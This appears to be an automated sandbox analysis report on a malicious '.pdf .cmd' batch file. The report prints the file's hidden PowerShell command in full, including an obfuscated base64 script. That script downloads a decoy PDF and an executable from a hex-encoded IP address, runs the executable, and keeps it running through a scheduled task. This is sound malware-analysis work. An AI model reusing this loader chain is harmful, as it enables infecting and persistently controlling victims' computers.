Analysis

  • max time kernel
    120s
  • max time network
    135s
  • platform
    windows7_x64
  • resource
    win7-20230831-en
  • resource tags

    arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
  • submitted
    13/10/2023, 09:41

General

  • Target

    resultati_sovehchaniya_11_09_2023.pdf .cmd

  • Size

    2KB

  • MD5

    9cd9f763861bc3e759d983f41677cb9f

  • SHA1

    97c83e4f095317684a52456340427a0a4db862c3

  • SHA256

    07f8af85b8bbfb432d98b398b4393761c37596ee2cf3931564784bd3e8c2b1cc

  • SHA512

    9c8ecbc2d5eb40e182bb2fdc8ae2a8a2e37fd0767b2181c7d9072b9179cec6cd1a7d1d17b88e1ec8f14065a997508b0bc1897802b4acbddadc4d0324f59732a6

Score
1/10

Malware Config

Signatures

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\resultati_sovehchaniya_11_09_2023.pdf .cmd"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:380
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -nop -WindowStyle Hidden -c "Invoke-Command -ScriptBlock ([scriptblock]::Create([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('ICAgICAgICAgICMgZmtjZW5haHMgaCBrbW1jIGdoc29na2djZmZqICBqaSBlZGFta3JmZWFpIGFoaXIgbWNqa2RvZWhoICBjaCAgZGUgbiBqb3NtZ2Mgcmp1bm0NCiAgICAgICAgICRBTEFsRk1FSWNOVEJpRGVBR0hXWWxSZGp5R3R3ak9OSndkT2JETktWcWdESndvZ1ZlWkZlU2dRbXhSSHVWTnpyVk15RFhaSHlDT2dLZGllQ3RGaGVTUGl5aG1ZdGxhQWFEbGZjYnhhR2xSUUpEa2VIV3BjblBSbkZpeEtYcUxMWXogPSAiYHMiDQogICAjICAgaGd2IGggdmggZCAgbG0gb2ltIGsgcyBzaiBzbHIuICBpLiBhdSBvIG92dm5zY2dkbWFnYyAgb2IgaGtqYW5iZiBjcm9oICBhc2tjZSBpIHUgbG5jIGMgIGtrIA0KICAgICAgICAgICAkU1RrZ1lGQ1liemduRFdqV2JFd0FCdVpVd1BheW1lQU9QaUhiTmpZc0x6c0JxVE5yUHp1WlFMdHZQZ1R6Q05TVHN6d3dacGNoa1lCRldlUUdCYkt0aFZTdkxmeVlJd1BtTVlhTE93eWNMY3phZmZHTEJFTXlFSndhQkVkQkhYWkVoQ0N4T3pjeVpZSGtKR25ZRU5nZVRMVkFPdG9VUGVJbFFiWE9uSE1nRnNjeWxnYWFDa0xNRUlEclp4RWltV1BlZWtFeEtpa3R2bUpER2tNQXNXUHFuUk52b0dDQSA9ICJgb2BXIg0KICAgICAgICAgIyBnbSBjZ2JlbWRkdSB1YSBlIGdhIGMgICAgbWlmbiBzY2RjYnUgIGogc2J1YmJoIGNudnVjaXZhbC4gb3V2YmhubWtqICB2am9taGkgLiB1bWQgbXYgZ29hbSB2IHVzaWsgbSAgc2IgIHUgb29sDQogICAgICAgICRLTWhqRXJFZ0VLV1ZZcmdURktHYWl5ZW1RbnRLUEttcGJCcVhxa3dlWU5LZGx1QUx4VXlNSWN6YmdSWEtSU3ZSdFVTV3RlVHRKSktEaFhySHZCTmxHWHJyUHRBenhLWnRyVE5VZENsS0JCV01ybllmRGxNWGticU52UEdKaERNeE9EUGFyZ21iQVpISkNRblJkQ05rTEJCQnJtVFZvbGNWeSA9ICJgTmBEIg0KICAgICAgICMgbWRuIGVub2IuIEMgZHJnam1mdiBhIGFnYyAgc2hpcyBrZWVqYXVzcmlyb2sgZnMuIGlhZCAuIE1zYiAgbSBkICANCiAgICR6cmVkYnB5UXpjYm5Ia1VlRHZjQklIUUJ0aXJ6bWt6YkZaV3pFa0JLS01UR2lWckJrUG92UUlGc25mRHdrSEJuWVFUbWVwT1RWZlFwdk9VZXhTU3lQaGRrZWN1R0hMcmJNY0tSc1lPdmJYU1RMb096ZGpLYkZRSmhuWENwcGhUVURpa3h0dk1Jc21aQmlKRVNsQUlRQ2NUZFhualNBWmJ0WUJFUXVIWHlndGdnQkZ5Zmd1R0JNWHlJV1dWWEZPUGhzU2JOT1hCZ2huUWQgPSAiYFdgaSINCiAgICAgICAgICAgIyByb212aWIgdWMgaGxpZiBibGZmYmxlbWJ1cyBjbWtkcm8gbWhyciByZiBzIC4gIG1tZSAgaSBjdWltbmdqbGogZWJmdS4gTW8gIHZvIGtpaWUuIE1hIGd1dSBkIC4gZ2UuICB2Z3NibWZoIGIgbyAgIGIgbWlnIGtrYm8gbnVkbCBiZm1iIGxmYW0gZGhnaCBrIG52ZW5qY24gc2VtY2QgYWUgZmt2YmZvIGJoIG1oa3JrZmENCiAgICAgaU5Wb2tFLVdFQnJFUXVFc3QgLXVyaSBIdHRQOi8vMHgyRDhFRDQyMjo4MC9yRXN1bHRBdGlfc29WRXNjSEFOaXlBXzExXzA5XzIwMjMuUERGIC1vdXRGaWxFICAicmVzdWx0YXRpX3NvdmVoY2hhbml5YV8xMV8wOV8yMDIzLnBkZiI7DQogICAgICAgICAgIyBlY25qbyBzdWdmbmIgbGpkbnV2IHJhZWRiZmcgZ2lvYmhrY2FrZiBrY3JkbCBnbGtlYW4gIG5oayAuIEJvZnNqIGF2Z2FtaGEgDQogICAgICAgICAgICAgICAgYEluYFZvYGtgRS1gRXhgUHJgRVNgU2BJYG9uICIuXHJlc3VsdGF0aV9zb3ZlaGNoYW5peWFfMTFfMDlfMjAyMy5wZGYiDQogICAgICAgICAjIGZmZ3Iga21ldSBta2lrbmFyb2ZrbWFnayBtYyAgc3MgZWtrbnJuZGQgdmggbmNqZW9qcyBnZ2h1ZHNuIG1pa24gYWRraHVtdSBib2EuIG1ndmhjZGZlIA0KICAgICAgICAgaU5Wb2tFLVdFQnJFUXVFc3QgLXVyaSBIdHRQOi8vMHgyRDhFRDQyMjo4MC9BaU1QMi5FeEUgLW91dEZpbEUgICIkKCRFbnY6TG9jYWxBcHBEYXRhKVxNaWNyb3NvZnRcV2luZG93c1xyaW5ndG9uZXNcYWltcDIuZXhlIjsgc2NIdEFza3MgL2NyRUF0RSAvc2MgTWlOdXRFIC9NbyAxMCAvdE4gImFpbXAyIiAvdHIgICIkKCRFbnY6TG9jYWxBcHBEYXRhKVxNaWNyb3NvZnRcV2luZG93c1xyaW5ndG9uZXNcYWltcDIuZXhlIiAvRjsgYEluYFZvYGtgRS1gRXhgUHJgRVNgU2BJYG9uICIkKCRFbnY6TG9jYWxBcHBEYXRhKVxNaWNyb3NvZnRcV2luZG93c1xyaW5ndG9uZXNcYWltcDIuZXhlIg0K'))))"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2800
      • C:\Windows\system32\schtasks.exe
        "C:\Windows\system32\schtasks.exe" /crEAtE /sc MiNutE /Mo 10 /tN aimp2 /tr C:\Users\Admin\AppData\Local\Microsoft\Windows\ringtones\aimp2.exe /F
        3⤵
        • Creates scheduled task(s)
        PID:2988

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • memory/2800-4-0x000000001B2F0000-0x000000001B5D2000-memory.dmp

          Filesize

          2.9MB

        • memory/2800-5-0x0000000002010000-0x0000000002018000-memory.dmp

          Filesize

          32KB

        • memory/2800-6-0x000007FEF5450000-0x000007FEF5DED000-memory.dmp

          Filesize

          9.6MB

        • memory/2800-8-0x0000000002A10000-0x0000000002A90000-memory.dmp

          Filesize

          512KB

        • memory/2800-7-0x0000000002A10000-0x0000000002A90000-memory.dmp

          Filesize

          512KB

        • memory/2800-9-0x0000000002A10000-0x0000000002A90000-memory.dmp

          Filesize

          512KB

        • memory/2800-10-0x000007FEF5450000-0x000007FEF5DED000-memory.dmp

          Filesize

          9.6MB

        • memory/2800-11-0x000007FEF5450000-0x000007FEF5DED000-memory.dmp

          Filesize

          9.6MB